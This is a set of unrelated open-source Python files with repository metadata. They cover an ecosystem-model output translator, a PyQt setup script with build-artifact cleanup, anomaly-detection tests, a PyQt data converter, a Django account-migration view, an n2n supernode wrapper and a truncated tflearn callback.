beta = out["wtfac_root"]
nep = out["nep"] * tonnes_per_ha_to_g_m2
gpp = out["gpp"] * tonnes_per_ha_to_g_m2
npp = out["npp"] * tonnes_per_ha_to_g_m2
rh = out["hetero_resp"] * tonnes_per_ha_to_g_m2
ra = out["auto_resp"] * tonnes_per_ha_to_g_m2
et = out["et"] # mm of water' are same value as kg/m2
trans = out["transpiration"] # mm of water' are same value as kg/m2
soil_evap = out["soil_evap"] # mm of water' are same value as kg/m2
can_evap = out["canopy_evap"] # mm of water' are same value as kg/m2
runoff = out["runoff"] # mm of water' are same value as kg/m2
gl = out["cpleaf"] * tonnes_per_ha_to_g_m2
# gw summed from cpstem and cpbranch below
cpstem = out["cpstem"] * tonnes_per_ha_to_g_m2
cpbranch = out["cpbranch"] * tonnes_per_ha_to_g_m2
gr = out["cproot"] * tonnes_per_ha_to_g_m2
gcr = out["cpcroot"] * tonnes_per_ha_to_g_m2
deadleaves = out["deadleaves"] * tonnes_per_ha_to_g_m2
deadroots = out["deadroots"] * tonnes_per_ha_to_g_m2
deadcroots = out["deadcroots"] * tonnes_per_ha_to_g_m2
deadbranch = out["deadbranch"] * tonnes_per_ha_to_g_m2
deadstems = out["deadstems"] * tonnes_per_ha_to_g_m2
deadleafn = out["deadleafn"] * tonnes_per_ha_to_g_m2
deadbranchn = out["deadbranchn"] * tonnes_per_ha_to_g_m2
deadstemn = out["deadstemn"] * tonnes_per_ha_to_g_m2
deadrootn = out["deadrootn"] * tonnes_per_ha_to_g_m2
deadcrootn = out["deadcrootn"] * tonnes_per_ha_to_g_m2
nup = out["nuptake"] * tonnes_per_ha_to_g_m2
ngross = out["ngross"] * tonnes_per_ha_to_g_m2
nmin = out["nmineralisation"] * tonnes_per_ha_to_g_m2
npleaf = out["npleaf"] * tonnes_per_ha_to_g_m2
nproot = out["nproot"] * tonnes_per_ha_to_g_m2
npcroot = out["npcroot"] * tonnes_per_ha_to_g_m2
npstemimm = out["npstemimm"] * tonnes_per_ha_to_g_m2
npstemmob = out["npstemmob"] * tonnes_per_ha_to_g_m2
npbranch = out["npbranch"] * tonnes_per_ha_to_g_m2
apar = out["apar"] / SW_RAD_TO_PAR
gcd = out["gs_mol_m2_sec"]
ga = out["ga_mol_m2_sec"]
nleach = out["nloss"] * tonnes_per_ha_to_g_m2
activesoil = out["activesoil"] * tonnes_per_ha_to_g_m2
slowsoil = out["slowsoil"] * tonnes_per_ha_to_g_m2
passivesoil = out["passivesoil"] * tonnes_per_ha_to_g_m2
cfretransn = out["leafretransn"] * tonnes_per_ha_to_g_m2
deadleafp = out["deadleafp"] * tonnes_per_ha_to_g_m2
deadbranchp = out["deadbranchp"] * tonnes_per_ha_to_g_m2
deadstemp = out["deadstemp"] * tonnes_per_ha_to_g_m2
deadrootp = out["deadrootp"] * tonnes_per_ha_to_g_m2
deadcrootp = out["deadcrootp"] * tonnes_per_ha_to_g_m2
pup = out["puptake"] * tonnes_per_ha_to_g_m2
pgross = out["pgross"] * tonnes_per_ha_to_g_m2
pmin = out["pmineralisation"] * tonnes_per_ha_to_g_m2
ppleaf = out["ppleaf"] * tonnes_per_ha_to_g_m2
pproot = out["pproot"] * tonnes_per_ha_to_g_m2
ppcroot = out["ppcroot"] * tonnes_per_ha_to_g_m2
ppstemimm = out["ppstemimm"] * tonnes_per_ha_to_g_m2
ppstemmob = out["ppstemmob"] * tonnes_per_ha_to_g_m2
ppbranch = out["ppbranch"] * tonnes_per_ha_to_g_m2
pleach = out["ploss"] * tonnes_per_ha_to_g_m2
cfretransp = out["leafretransp"] * tonnes_per_ha_to_g_m2
# extra traceability stuff
tfac_soil_decomp = out["tfac_soil_decomp"]
c_into_active = out["c_into_active"] * tonnes_per_ha_to_g_m2
c_into_slow = out["c_into_slow"] * tonnes_per_ha_to_g_m2
c_into_passive = out["c_into_passive"] * tonnes_per_ha_to_g_m2
active_to_slow = out["active_to_slow"] * tonnes_per_ha_to_g_m2
active_to_passive = out["active_to_passive"] * tonnes_per_ha_to_g_m2
slow_to_active = out["slow_to_active"] * tonnes_per_ha_to_g_m2
slow_to_passive = out["slow_to_passive"] * tonnes_per_ha_to_g_m2
passive_to_active = out["passive_to_active"] * tonnes_per_ha_to_g_m2
co2_rel_from_surf_struct_litter = out["co2_rel_from_surf_struct_litter"] * tonnes_per_ha_to_g_m2
co2_rel_from_soil_struct_litter = out["co2_rel_from_soil_struct_litter"] * tonnes_per_ha_to_g_m2
co2_rel_from_surf_metab_litter = out["co2_rel_from_surf_metab_litter"] * tonnes_per_ha_to_g_m2
co2_rel_from_soil_metab_litter = out["co2_rel_from_soil_metab_litter"] * tonnes_per_ha_to_g_m2
co2_rel_from_active_pool = out["co2_rel_from_active_pool"] * tonnes_per_ha_to_g_m2
co2_rel_from_slow_pool = out["co2_rel_from_slow_pool"] * tonnes_per_ha_to_g_m2
co2_rel_from_passive_pool = out["co2_rel_from_passive_pool"] * tonnes_per_ha_to_g_m2
# extra priming stuff
rexc = [UNDEF] * len(doy)
rexn = [UNDEF] * len(doy)
co2x = [UNDEF] * len(doy)
factive = [UNDEF] * len(doy)
rtslow = [UNDEF] * len(doy)
rexcue = [UNDEF] * len(doy)
cslo = out["slowsoil"] * tonnes_per_ha_to_g_m2
nslo = out["slowsoiln"] * tonnes_per_ha_to_g_m2
cact = out["activesoil"] * tonnes_per_ha_to_g_m2
nact = out["activesoiln"] * tonnes_per_ha_to_g_m2
# Misc stuff we don't output
drainage = [UNDEF] * len(doy)
rleaf = [UNDEF] * len(doy)
rwood = [UNDEF] * len(doy)
rcr = [UNDEF] * len(doy)
rfr = [UNDEF] * len(doy)
rgrow = [UNDEF] * len(doy)
rsoil = [UNDEF] * len(doy)
cex = [UNDEF] * len(doy)
cvoc = [UNDEF] * len(doy)
lh = [UNDEF] * len(doy)
sh = [UNDEF] * len(doy)
ccoarse_lit = [UNDEF] * len(doy)
ndw = [UNDEF] * len(doy)
pclitb = [UNDEF] * len(doy)
nvol = [UNDEF] * len(doy)
gb = [UNDEF] * len(doy)
grepr = [UNDEF] * len(doy)
cwretransn = [UNDEF] * len(doy)
ccrretransn = [UNDEF] * len(doy)
cfrretransn = [UNDEF] * len(doy)
plretr = [UNDEF] * len(doy)
pwretr = [UNDEF] * len(doy)
pcrretr = [UNDEF] * len(doy)
pfrretr = [UNDEF] * len(doy)
# Misc calcs from fluxes/state
lma = shoot / lai
ncon = shootn / shoot
nflit = litternag + litternbg
pflit = litterpag + litterpbg
pcon = shootp / shoot
recosys = rh + ra
secp = inorgsorbp + inorgssorbp
cw = stem + branch
cwp = stemp + branchp
gw = cpstem + cpbranch
cwn = stemn + branchn
cwin = deadstems + deadbranch
ccrlin = deadcroots
cfrlin = deadroots
ndeadwood = deadbranchn + deadstemn
pdeadwood = deadbranchp + deadstemp
nwood_growth = npstemimm + npstemmob + npbranch
pwood_growth = ppstemimm + ppstemmob + ppbranch
return {'YEAR':year, 'DOY':doy, 'SW':pawater_root, 'SWPA':pawater_root,
'NEP':nep, 'GPP':gpp, 'NPP':npp, 'CEX':cex, 'CVOC':cvoc,
'RECO':recosys, 'RAU':ra, 'RL':rleaf, 'RW':rwood,
'RCR':rcr, 'RFR':rfr,
'RGR':rgrow, 'RHET':rh, 'RSOIL':rsoil, 'ET':et, 'T':trans,
'ES':soil_evap, 'EC':can_evap, 'RO':runoff, 'DRAIN':drainage,
'LE':lh, 'SH':sh, 'CL':shoot, 'CW':cw, 'CCR':coarse_root,
'CFR':fine_root, 'CSTOR':tnc, 'CFLIT':litterc, 'CFLITA':littercag,
'CFLITB':littercbg, 'CCLITB':ccoarse_lit, 'CSOIL':soilc,
'CGL':gl, 'CGW':gw, 'CGCR':gcr, 'CGFR':gr, 'CREPR':grepr, 'CLITIN':deadleaves,
'CCRLIN':ccrlin, 'CFRLIN':cfrlin, 'CWLIN':cwin, 'LAI':lai, 'LMA':lma, 'NCON':ncon,
'NL':shootn, 'NW':cwn, 'NCR':coarse_rootn, 'NFR':rootn,
'NSTOR':nstorage, 'NFLIT': nflit, 'NFLITA':litternag, 'NFLITB':litternbg, 'NCLITB':ndw,
'NSOIL':nsoil, 'NPMIN':inorgn, 'NPORG':npoolo,
'NGL':npleaf, 'NGW':nwood_growth, 'NGCR':npcroot, 'NGFR':nproot,
'NLITIN':deadleafn, 'NCRLIN':deadcrootn,
'NFRLIN':deadrootn, 'NWLIN':ndeadwood, 'NUP':nup,
'NGMIN':ngross, 'NMIN':nmin, 'NVOL': nvol, 'NLEACH':nleach,
'NLRETR':cfretransn, 'NWRETR':cwretransn,
'NCRRETR':ccrretransn, 'NFRRETR':cfrretransn,
'APARd':apar, 'GCd':gcd, 'GAd':ga, 'Gbd':gb, 'Betad':beta,
'PL':shootp, 'PW':cwp,
'PCR':crootp, 'PFR':rootp,
'PSTOR':pstorage, 'PFLIT':pflit,
'PFLITA':litterpag, 'PFLITB':litterpbg, 'PCLITB':pclitb,
'PSOIL':psoil, 'PLAB':inorglabp,
'PSEC':secp, 'POCC':inorgoccp,
'PPAR':inorgparp,
'PPMIN':inorgp, 'PPORG':ppoolo,
'PLITIN':deadleafp, 'PCRLIN':deadcrootp,
'PFRLIN':deadrootp, 'PWLIN':pdeadwood, 'PUP':pup,
'PGMIN':pgross, 'PMIN':pmin, 'PLEACH':pleach,
'PGL':ppleaf, 'PGW':pwood_growth, 'PGCR':ppcroot, 'PGFR':pproot,
'PLRETR':cfretransp, 'PWRETR':pwretr, 'PFRRETR':pcrretr, 'PFRRETR':pfrretr,
'CTOACTIVE':c_into_active, 'CTOSLOW':c_into_slow,
'CTOPASSIVE':c_into_passive, 'CACTIVETOSLOW':active_to_slow,
'CACTIVETOPASSIVE':active_to_passive, 'CSLOWTOACTIVE':slow_to_active,
'CSLOWTOPASSIVE':slow_to_passive, 'CPASSIVETOACTIVE':passive_to_active,
'CACTIVE':activesoil, 'CSLOW':slowsoil, 'CPASSIVE':passivesoil,
'CO2SLITSURF':co2_rel_from_surf_struct_litter,
'CO2SLITSOIL':co2_rel_from_soil_struct_litter,
'CO2MLITSURF':co2_rel_from_surf_metab_litter,
'CO2MLITSOIL':co2_rel_from_soil_metab_litter,
'CO2FSOM':co2_rel_from_active_pool,
'CO2SSOM':co2_rel_from_slow_pool,
'CO2PSOM':co2_rel_from_passive_pool,
'TFACSOM':tfac_soil_decomp,
'REXC':rexc,
'REXN':rexn,
'CO2X':co2x,
'FACTIVE':factive,
'RTSLOW':rtslow,
'REXCUE':rexcue,
'CSLO':cslo,
'NSLO':nslo,
'CACT':cact,
'NACT':nact}, git_ver
def setup_units():
units = ['--','--','Mean ppm', 'mm d-1', 'mol m-2', 'Mean DegC', 'Mean DegC',
'kPa h', 'mm', 'mm', 'gN m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'kgH2O m-2 d-1',
'kgH2O m-2 d-1', 'kgH2O m-2 d-1', 'kgH2O m-2 d-1',
'kgH2O m-2 d-1', 'kgH2O m-2 d-1', 'MJ m-2', 'MJ m-2',
'gC m-2', 'gC m-2', 'gC m-2', 'gC m-2', 'gC m-2', 'gC m-2',
'gC m-2', 'gC m-2', 'gC m-2', 'gC m-2 0 to 30 cm',
'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
'gC m-2 d-1', 'm2 m-2', 'gC m-2',
'gN gd.m.-1', 'gN m-2', 'gN m-2', 'gN m-2', 'gN m-2', 'gN m-2',
'gN m-2', 'gN m-2', 'gN m-2', 'gN m-2', 'gN m-2 0 to 30 cm',
'gN m-2 0 to 30 cm', 'gN m-2 0 to 30 cm', 'gN m-2 d-1',
'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1',
'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1',
'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1',
'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1',
'gN m-2 d-1', 'gN m-2 d-1',
'MJ m-2 d-1', 'mol H2O m-2 s-1', 'mol H2O m-2 s-1',
'mol H2O m-2 s-1', 'frac',
'gP m-2', 'gP m-2', 'gP m-2',
'gP m-2', 'gP m-2', 'gP m-2',
'gP m-2', 'gP m-2', 'gP m-2',
'gP m-2', 'gP m-2',
'gP m-2', 'gP m-2',
'gP m-2', 'gP m-2',
'gP m-2','gP m-2 d-1', 'gP m-2 d-1',
'gP m-2 d-1','gP m-2 d-1', 'gP m-2 d-1',
'gP m-2 d-1', 'gP m-2 d-1', 'gP m-2 d-1',
'gP m-2 d-1', 'gP m-2 d-1', 'gP m-2 d-1', 'gP m-2 d-1',
'gP m-2 d-1', 'gP m-2 d-1', 'gP m-2 d-1', 'gP m-2 d-1',
'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
'gC m-2', 'gC m-2', 'gC m-2',
'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
'frac', 'gC m-2 d-1', 'gN m-2 d-1', 'gC m-2 d-1',
'gC m-2 d-1', 'years', 'frac', 'gC m-2 d-1', 'gN m-2 d-1',
'gC m-2 d-1', 'gN m-2 d-1']
return units
def setup_varnames():
variable = ['Year', 'Day of the year', 'CO2', 'Precipitation', 'PAR',
'Air temp canopy', 'Soil temp 10 cm', 'Vapour Pres Def',
'Total soil water content', 'Plant available soil water content',
'N deposition', 'Net Eco Prod',
'Gross Prim Prod', 'Net Prim Prod', 'C exudation',
'C VOC Flux', 'Resp ecosystem', 'Resp autotrophic',
'Resp leaves (maint)', 'Resp Wood (maint)',
'Resp coarse root (maint)',
'Resp Fine Root (maint)', 'Resp growth',
'Resp heterotrophic',
'Evapotranspiration', 'Transpiration', 'Soil Evaporation',
'Canopy evaporation', 'Runoff', 'Drainage', 'Latent Energy',
'Sensible Heat', 'C Leaf Mass', 'C Wood Mass',
'C Coarse Root mass', 'C Fine Root mass',
'C Storage as TNC', 'C Fine Litter Total',
'C Fine Litter above', 'C Fine Litter below',
'C Coarse Litter', 'C Soil', 'C Leaf growth',
'C Wood growth', 'C Coarse Root growth',
'C Fine Root growth', 'C reproduction growth',
'C Leaf Litterfall',
'C Coarse Root litter inputs', 'C Fine Root litter inputs',
'C Wood/branch inputs',
'LAI projected', 'Leaf gC/leaf area', 'N Conc Leaves',
'N Mass Leaves', 'N Mass Wood', 'N Mass Coarse Roots',
'N Mass Fine Roots', 'N storage', 'N fine litter total', 'N litter aboveground',
'N litter belowground', 'N Dead wood', 'N Soil Total',
'N in Mineral form', 'N in Organic form', 'N fixation',
'N Leaf growth', 'N Wood growth', 'N CR growth', 'N Fine Root growth',
'N Leaf Litterfall',
'N Coarse Root litter input', 'N Fine Root litter input',
'N Wood/brch litterfall', 'N Biomass Uptake',
'N Gross Mineralization', 'N Net mineralization',
'N Volatilization', 'N Leaching',
'Foliage retranslocation',
'Wood/Branch retranslocation', 'Coarse Root retranslocation',
'Fine Root retranslocation',
'Aborbed PAR', 'Average daytime canopy conductance',
'Average daytime aerodynamic conductance',
'Average daytime leaf boundary conductance',
'Soil moisture stress',
'P Mass Leaves',
'P Mass Wood', 'P Mass Coarse Roots', 'P Mass Fine Roots',
'P storage', 'P litter total', 'P litter aboveground', 'P litter belowground',
'P coarse litter',
'P Soil Total', 'P in labile form',
'P in secondary form',
'P in occluded form', 'P parent pool',
'P Inorganic pool',
'P in Organic form','P Leaf Litterfall',
'P Coarse Root litter input','P Fine Root litter input', 'P Wood/brch litterfall',
'P Biomass Uptake',
'P Gross Mineralisation', 'P Net mineralisation', 'P Leaching',
'P Leaf growth', 'P Wood growth', 'P CR growth', 'P Fine Root growth',
'P Foliage retranslocation',
'P Wood/Branch retranslocation', 'P Coarse Root retranslocation',
'P Fine Root retranslocation',
'C fluxes from litter & slow/passive to active soil pool',
'C fluxes from litter & active soil pool to slow pool',
'C fluxes from active & slow soil pool to passive pool',
'C flux from active soil pool to slow soil pool',
'C flux from active soil pool to passive soil pool',
'C flux from slow soil pool to active soil pool',
'C flux from slow pool to passive soil pool',
'C flux from passive pool to active pool',
'C Active SOM pool',
'C Slow SOM pool',
'C Passive SOM pool',
'CO2 efflux from surf structural litter',
'CO2 efflux from soil structural litter',
'CO2 efflux from surf metabolic litter',
'CO2 efflux from soil metabolic litter',
'CO2 efflux from fast SOM pool',
'CO2 efflux from slow SOM pool',
'CO2 efflux from passive SOM pool',
'Temperature scalar on C efflux from SOM pools',
'Root Exudation of C',
'Root Exudation of N',
'CO2 released from exudation',
'Total C flux from the active pool',
'Residence time of slow pool',
'REXC carbon use efficiency',
'Total C in the slow pool',
'Total N in the slow pool',
'Total C in the active pool',
'Total N in the active pool']
variable_names = ['YEAR', 'DOY', 'CO2', 'PREC', 'PAR', 'TAIR', 'TSOIL', 'VPD',
'SW', 'SWPA', 'NDEP', 'NEP', 'GPP', 'NPP', 'CEX', 'CVOC',
'RECO', 'RAU', 'RL', 'RW', 'RCR', 'RFR', 'RGR',
'RHET',
'ET', 'T', 'ES', 'EC', 'RO', 'DRAIN', 'LE', 'SH',
'CL', 'CW', 'CCR', 'CFR', 'CSTOR', 'CFLIT', 'CFLITA',
'CFLITB', 'CCLITB', 'CSOIL', 'CGL', 'CGW', 'CGCR', 'CGFR',
'CREPR','CLITIN', 'CCRLIN', 'CFRLIN','CWLIN', 'LAI',
'LMA', 'NCON', 'NL', 'NW', 'NCR', 'NFR', 'NSTOR',
'NFLIT', 'NFLITA','NFLITB', 'NCLITB', 'NSOIL', 'NPMIN', 'NPORG', 'NFIX',
'NGL', 'NGW', 'NGCR', 'NGFR',
'NLITIN', 'NCRLIN', 'NFRLIN','NWLIN', 'NUP', 'NGMIN', 'NMIN',
'NVOL', 'NLEACH', 'NLRETR', 'NWRETR',
'NCRRETR', 'NFRRETR', 'APARd',
'GCd', 'GAd', 'GBd', 'Betad',
'PL', 'PW',
'PCR', 'PFR','PSTOR',
'PFLIT', 'PFLITA', 'PFLITB', 'PCLITB',
'PSOIL', 'PLAB',
'PSEC', 'POCC',
'PPAR',
'PPMIN', 'PPORG',
'PLITIN', 'PCRLIN',
'PFRLIN', 'PWLIN', 'PUP',
'PGMIN', 'PMIN', 'PLEACH',
'PGL', 'PGW', 'PGCR', 'PGFR',
'PLRETR', 'PWRETR', 'PCRRETR', 'PFRRETR',
'CTOACTIVE', 'CTOSLOW', 'CTOPASSIVE', 'CACTIVETOSLOW',
'CACTIVETOPASSIVE', 'CSLOWTOACTIVE', 'CSLOWTOPASSIVE',
'CPASSIVETOACTIVE', 'CACTIVE', 'CSLOW', 'CPASSIVE',
'CO2SLITSURF', 'CO2SLITSOIL', 'CO2MLITSURF',
'CO2MLITSOIL', 'CO2FSOM', 'CO2SSOM', 'CO2PSOM',
'TFACSOM','REXC','REXN','CO2X','FACTIVE','RTSLOW','REXCUE',
'CSLO','NSLO','CACT','NACT']
return variable, variable_names
if __name__ == "__main__":
fname = "dk_fixco2_fixndep_forest_equilib.out"
# met_fname = "duke_equilibrium_metdata_fixndep_0.004_fixco2_270.gin"
translate_output(fname)
|
mingkaijiang/quasi_equil_analytical
|
GDAY/code/scripts/translate_GDAY_output_to_NCEAS_format.py
|
Python
|
gpl-3.0
| 26,132
|
import pandas
import numpy
import sys
import re
filename = ""
if len(sys.argv) == 2:
filename = sys.argv[1]
else:
print("usage: ", sys.argv[0], " filename.xlsx")
exit(1)
df = pandas.read_excel(filename)
cn = df.columns
print("CN: ", cn)
values = numpy.asarray(df[cn[0]].values)
print(numpy.mean(values), " ", numpy.std(values))
|
lstorchi/teaching
|
basictests/usingpandas.py
|
Python
|
gpl-3.0
| 345
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
import os
import glob
import sys
from distutils.core import setup
from distutils.cmd import Command
from distutils.command.build import build
from distutils.command.install import install
from src.constants import const
def clear():
os.system("find ./ -iname '*.pyc' |xargs rm -rfv")
os.system("find ./ -iname '*~' |xargs rm -rfv")
os.system("find ./ -iname '*.mo' | xargs rm -rfv")
os.system("find ./ -iname 'ui_*.py' | xargs rm -rfv")
os.system("find ./ -iname 'MANIFEST' | xargs rm -rfv")
os.system("find ./ -iname 'lokalize-scripts' | xargs rm -rfv")
def msgUpdate():
# Generate POT file
os.chdir("po")
os.system("/usr/bin/intltool-update -p")
os.system("mv untitled.pot source.pot")
# Update PO files
for item in os.listdir("."):
if item.endswith(".po"):
os.system("msgmerge -U %s source.pot" % (item) )
os.chdir("..")
clear()
def makeDirs(dir):
try:
os.makedirs(dir)
except OSError:
pass
class Build(build):
def run(self):
# Clear source and build data
libdir = "build/lib/%s" %const.APP_NAME
clear()
print os.system("/bin/rm -rf build")
makeDirs(libdir)
makeDirs("build/desktop")
makeDirs("build/bin")
makeDirs("build/locales")
print "Build codes..."
os.system("cp -Rv src/*.py %s" %libdir)
# Collect UI files
print "Build ui..."
for filename in glob.glob1("qt4", "*.ui"):
print os.system("/usr/bin/pyuic4 -o %s/ui_%s.py qt4/%s" % (libdir, filename.split(".")[0], filename))
for filename in glob.glob1("qt4", "*.qrc"):
print os.system("/usr/bin/pyrcc4 -o %s/%s_rc.py qt4/%s" % (libdir, filename.split(".")[0], filename))
print "Build locales..."
for filename in glob.glob1("po", "*.po"):
lang = filename.rsplit(".", 1)[0]
print os.system("msgfmt po/%s.po -o build/locales/%s.mo" % (lang, lang))
print "Build .desktop file"
print os.system("intltool-merge -d po addfiles/%s.desktop.in build/desktop/%s.desktop" %(const.APP_NAME, const.APP_NAME) )
print "Build bin file"
self.copy_file("src/%s.py" %const.APP_NAME, "build/bin/%s" %const.APP_NAME )
self.copy_file("src/%s.py" %const.APP_NAME, "build/lib/" )
print("\n\nYou can run %s by this command; \n python build/lib/%s.py" %(const.APP_NAME, const.APP_NAME))
class Install(install):
def run(self):
print os.system("/bin/rm -rf install")
bin_dir = os.path.join(self.root, "usr/bin")
lib_dir = os.path.join(self.root, self.install_libbase, const.APP_NAME)
locale_dir = os.path.join(self.root, "usr/share/locale")
doc_dir = os.path.join(self.root, "usr/share/doc/%s" %const.APP_NAME)
icon_dir = os.path.join(self.root, "usr/share/pixmaps")
apps_dir = os.path.join(self.root, "usr/share/applications")
# Make directories
print "Making directories..."
makeDirs(bin_dir)
makeDirs(lib_dir)
makeDirs(locale_dir)
makeDirs(doc_dir)
makeDirs(icon_dir)
makeDirs(apps_dir)
# Install desktop files
print "Installing desktop and icon files..."
try:
self.copy_file("build/desktop/%s.desktop" %const.APP_NAME, "%s" %apps_dir)
self.copy_file("qt4/%s.png" %const.APP_NAME, "%s" %icon_dir)
except:
pass
# Install locales
print "Installing locales..."
for filename in glob.glob1("build/locales", "*.mo"):
lang = filename.rsplit(".", 1)[0]
try:
os.makedirs(os.path.join(locale_dir, "%s/LC_MESSAGES" %lang))
except OSError:
pass
self.copy_file("build/locales/%s.mo" % lang, os.path.join(locale_dir, "%s/LC_MESSAGES" %lang, "%s.mo" %const.APP_NAME))
# Install Docs
for filename in ["README", "COPYING", "AUTHORS", "ChangeLog"]:
self.copy_file(filename, os.path.join(doc_dir) )
print "Installing bin file"
self.copy_file("build/bin/%s" %const.APP_NAME, "%s/%s" %(bin_dir,const.APP_NAME) )
os.chmod("%s/%s" %(bin_dir,const.APP_NAME), 0755)
# Install Libraries
print "Installing libraries... "
print os.system("cp -v build/lib/%s/* %s" %(const.APP_NAME, lib_dir) )
if "msgupdate" in sys.argv:
msgUpdate()
sys.exit(0)
if "clear" in sys.argv:
clear()
sys.exit(0)
setup(
name = const.APP_NAME,
version = const.VERSION,
license = "GPLv3",
author = const.DEVELOPERS,
url = const.WEBPAGE,
packages = ["src"],
data_files = [],
cmdclass = {
'build': Build,
'install': Install
}
)
|
alierkanimrek/pog
|
setup.py
|
Python
|
gpl-3.0
| 5,009
|
from nose.tools import eq_
from pyculiarity import detect_ts, detect_vec
from unittest import TestCase
import pandas as pd
import os
class TestVec(TestCase):
def setUp(self):
self.path = os.path.dirname(os.path.realpath(__file__))
self.raw_data = pd.read_csv(os.path.join(self.path,
'raw_data.csv'),
usecols=['timestamp', 'count'])
def test_both_directions_with_plot(self):
results = detect_vec(self.raw_data.iloc[:,1], max_anoms=0.02,
direction='both', period=1440,
only_last=True, plot=False)
eq_(len(results['anoms'].columns), 2)
eq_(len(results['anoms'].iloc[:,1]), 25)
def test_both_directions_e_value_longterm(self):
results = detect_vec(self.raw_data.iloc[:,1], max_anoms=0.02,
direction='both', period=1440,
longterm_period=1440*14, e_value=True)
eq_(len(results['anoms'].columns), 3)
eq_(len(results['anoms'].iloc[:,1]), 131)
def test_both_directions_e_value_threshold_med_max(self):
results = detect_vec(self.raw_data.iloc[:,1], max_anoms=0.02,
direction='both', period=1440,
threshold="med_max", e_value=True)
eq_(len(results['anoms'].columns), 3)
eq_(len(results['anoms'].iloc[:,1]), 6)
|
nicolasmiller/pyculiarity
|
tests/test_vec.py
|
Python
|
gpl-3.0
| 1,514
|
#!/usr/bin/env python
# vim: set fileencoding=UTF-8 :
import data_convertor_ui
from data_convertor_ui import _translate
from PyQt4 import QtGui, QtCore
import sys, os, czelta,locale
try:
path = os.path.dirname(__file__)
except NameError:
path = ""
path = path+os.sep if path!="" else ""
sys_lang = locale.getdefaultlocale()[0][:2]
for i in range(len(sys.argv)):
if sys.argv[i]=="-lang":
sys_lang = sys.argv[i+1]
class MainWindow(data_convertor_ui.Ui_MainWindow):
def select_data(self):
fname = str(QtGui.QFileDialog.getOpenFileName(self.mainwindow, 'Open file',
self.last_directory if self.last_directory else os.path.expanduser('~'),"Shower data (*.dat *.txt)"))
if fname=='':
return
self.last_directory = os.path.dirname(fname)
self.path_data.setText(fname)
def convert_data(self):
format = "dat" if self.radio_dat_file.isChecked() else "txt"
fname = QtGui.QFileDialog.getSaveFileName(self.mainwindow, 'Save file', self.last_directory, "Shower data (*.%s)"%format)
if fname=='':
return
if not fname[-4:] in (".txt",".dat"):
fname += "."+format
event_reader = czelta.event_reader()
event_reader.load(str(self.path_data.displayText()))
if self.filter_calibrations.isChecked():
event_reader.filter_calibrations()
if self.filter_maximum_TDC.isChecked():
event_reader.filter_maximum_TDC()
if self.filter_maximum_ADC.isChecked():
event_reader.filter_maximum_ADC()
if self.filter_minimum_ADC.isChecked():
event_reader.filter_minimum_ADC()
try:
if event_reader.save(str(fname), not self.filter_x_events.isChecked()):
raise IOError
except IOError:
QtGui.QMessageBox.warning(self.mainwindow,
_translate("MainWindow", "error_title", None),
_translate("MainWindow", "error_cant_save", None))
return
except NotImplementedError:
QtGui.QMessageBox.warning(self.mainwindow,
_translate("MainWindow", "error_title", None),
_translate("MainWindow", "error_cant_save_bad_suffix", None))
return
QtGui.QMessageBox.information(self.mainwindow,
_translate("MainWindow", "success", None),
_translate("MainWindow", "file_saved", None))
def __init__(self):
self.last_directory = None
self.mainwindow = QtGui.QMainWindow()
self.setupUi(self.mainwindow)
self.mainwindow.show()
self.statusBar.showMessage(u"© 2014 Martin Quarda")
QtCore.QObject.connect(self.button_select_data, QtCore.SIGNAL('clicked()'), self.select_data)
QtCore.QObject.connect(self.button_convert, QtCore.SIGNAL('clicked()'), self.convert_data)
QtCore.QObject.connect(self.radio_txt_file, QtCore.SIGNAL('toggled(bool)'), self.filter_x_events.setEnabled)
def main():
app = QtGui.QApplication(sys.argv)
trans = QtCore.QTranslator()
trans.load("%sdata_convertor_%s.qm"%(path, sys_lang)) or trans.load("%sdata_convertor_en.qm"%path)
app.installTranslator(trans)
mw = MainWindow()
sys.exit(app.exec_())
if __name__ == "__main__":
main()
|
Hinogary/czelta-python
|
miniaplications/data_convertor.py
|
Python
|
gpl-3.0
| 3,370
|
from django.contrib.auth.decorators import login_required, \
permission_required
from django.views.decorators.debug import sensitive_post_parameters
from .migration import do_migration, \
openid_migration_method, \
confirm_migration
@sensitive_post_parameters('password')
@permission_required('openid_migration.add_openidusermigration')
@login_required()
def migrate_accounts(request):
'''
Manage user migration using AJAX.
'''
if request.method == 'POST':
operation = request.POST['operation']
if operation == 'addAuth':
return confirm_migration(request)
if operation == 'migrateAccount':
return do_migration(request)
return openid_migration_method(request)
|
wettenhj/mytardis
|
tardis/apps/openid_migration/views.py
|
Python
|
gpl-3.0
| 743
|
'''
Supernode wrapper
'''
from cmn.n2n_process import N2NProcess
from server.supernodep import SupernodeParams
class Supernode(N2NProcess):
PATH = "supernode"
def __init__(self, ip_str):
N2NProcess.__init__(self)
self.params = SupernodeParams()
self.params.foreground.setValue(True)
|
lukablurr/n2nsim
|
src/server/supernode.py
|
Python
|
gpl-3.0
| 330
|
import main
import time
import tflearn
import numpy as np
import pandas as pd
import tensorflow as tf
from tflearn.callbacks import Callback
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
from keras.layers.local import LocallyConnected2D
class MonitorCallback(Callback):
def __init__(self, args, start_time):
super(self.__class__, self).__init__()
self.args = args
self.start = start_time
self.log = args.model_name
def on_epoch_end(self, state):
main.log(self.args, '{:.5f}s Epoch '.format(time.clock() - self.start) + str(state.epoch).zfill(4) + ' Loss = {:.5f}'.format(state.global_loss) + ' Accuracy = {:.5}'.format(state.acc_value))
def on_train_end(self, state):
